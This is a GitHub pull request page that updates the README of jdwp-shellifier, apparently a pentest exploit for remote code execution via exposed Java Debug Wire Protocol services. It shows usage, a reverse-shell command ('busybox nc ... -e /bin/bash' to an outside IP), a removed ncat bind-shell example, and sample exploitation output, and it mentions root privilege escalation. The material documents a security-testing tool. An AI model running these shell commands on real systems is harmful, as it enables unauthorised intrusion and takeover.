Skip to content

[Refactoring] Python3 full compatibility + code cleaning for readability #11

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed
n3rada wants to merge 1 commit into from
Closed

[Refactoring] Python3 full compatibility + code cleaning for readability #11

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
79 changes: 57 additions & 22 deletions README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -4,33 +4,68 @@
This exploitation script is meant to be used by pentesters against active JDWP service, in order to gain Remote Code Execution.

## How does it work ?
Well, in a pretty standard way, the script only requires a Python 2 interpreter:
Well, in a pretty standard way, the script only requires a Python3 interpreter:
```shell
usage: jdwp-shellifier.py [-h] [-t IP] [-p PORT] [--break-on JAVA_METHOD] [-c COMMAND]

% python ./jdwp-shellifier.py -h
usage: jdwp-shellifier.py [-h] -t IP [-p PORT] [--break-on JAVA_METHOD]
[--cmd COMMAND]
Universal exploitation script for JDWP

Universal exploitation script for JDWP by @_hugsy_
options:
-h, --help show this help message and exit
-t IP, --target IP Remote target IP (default: 0.0.0.0)
-p PORT, --port PORT Remote target port (default: 8000)
--break-on JAVA_METHOD
Specify full path to method to break on (default: java.net.ServerSocket.accept)
-c COMMAND, --cmd COMMAND
Specify command to execute remotely (default: None)
```

optional arguments:
-h, --help show this help message and exit
-t IP, --target IP Remote target IP (default: None)
-p PORT, --port PORT Remote target port (default: 8000)
--break-on JAVA_METHOD
Specify full path to method to break on (default:
java.net.ServerSocket.accept)
--cmd COMMAND Specify full path to method to break on (default:
None)

To target a specific host/port:

$ python ./jdwp-shellifier.py -t my.target.ip -p 1234
By default, it targeted the `0.0.0.0` IP and `8000` port.

This command will only inject Java code on the JVM and show some info like Operating System, Java version. Since it does not execute external code/binary, it is totally safe and can be used as Proof-Of-Concept
This command will only inject Java code on the JVM and show some info like Operating System, Java version. Since it does not execute external code/binary, it is totally safe and can be used as Proof-Of-Concept.
```shell
python3 jdwp-shellifier.py -c "/bin/busybox nc 192.168.45.178 443 -e /bin/bash"
```

$ python ./jdwp-shellifier.py -t my.target.ip -p 1234 --cmd "ncat -v -l -p 1234 -e /bin/bash"

This command will actually execute the process `ncat` with the specified argument with the rights given to the running JVM.
This command will actually execute the process with the specified argument **with the rights given to the running JVM**. Thus, if it was ran by `root`, you'll basically get a low-hanging fruit Privilege Escalation.

Output will looks like:
```shell
[+] Target: 0.0.0.0:8000
[*] Trying to connect...
[+] Connection successful!
[+] Handshake sent
[+] Handshake successful
[*] Requesting ID sizes from the JDWP server...
• fieldIDSize: 8
• methodIDSize: 8
• objectIDSize: 8
• referenceTypeIDSize: 8
• frameIDSize: 8
[+] ID sizes have been successfully received and set.
[*] Requesting version information from the JDWP server...
• description: Java Debug Wire Protocol (Reference Implementation) version 11.0
JVM Debug Interface version 11.0
JVM version 11.0.16 (OpenJDK 64-Bit Server VM, mixed mode, sharing)
• jdwpMajor: 11
• jdwpMinor: 0
• vmVersion: 11.0.16
• vmName: OpenJDK 64-Bit Server VM
[+] Version information has been successfully received and set.
[+] Found Runtime class: id=0x8b1
[+] Found Runtime.getRuntime(): id=0x7f2ae8023998
[+] Created break event id=0x2
[+] Resume VM signal sent
[+] Waiting for an event on 'accept'
[*] Go triggering the corresponding ServerSocket (e.g., 'nc ip 5000 -z')
[+] Received matching event from thread 0x94d
[+] Payload to send: '/bin/busybox nc 192.168.45.178 443 -e /bin/bash'
[+] Command string object created id:94e
[+] Runtime.getRuntime() returned context id:0x94f
[+] Found Runtime.exec(): id=7f2ae80239d0
[+] Runtime.exec() successful, retId=950
[+] Resume VM signal sent
```

Before sending questions, make sure to read http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html for full understanding of the JDWP protocol.

Expand Down
Loading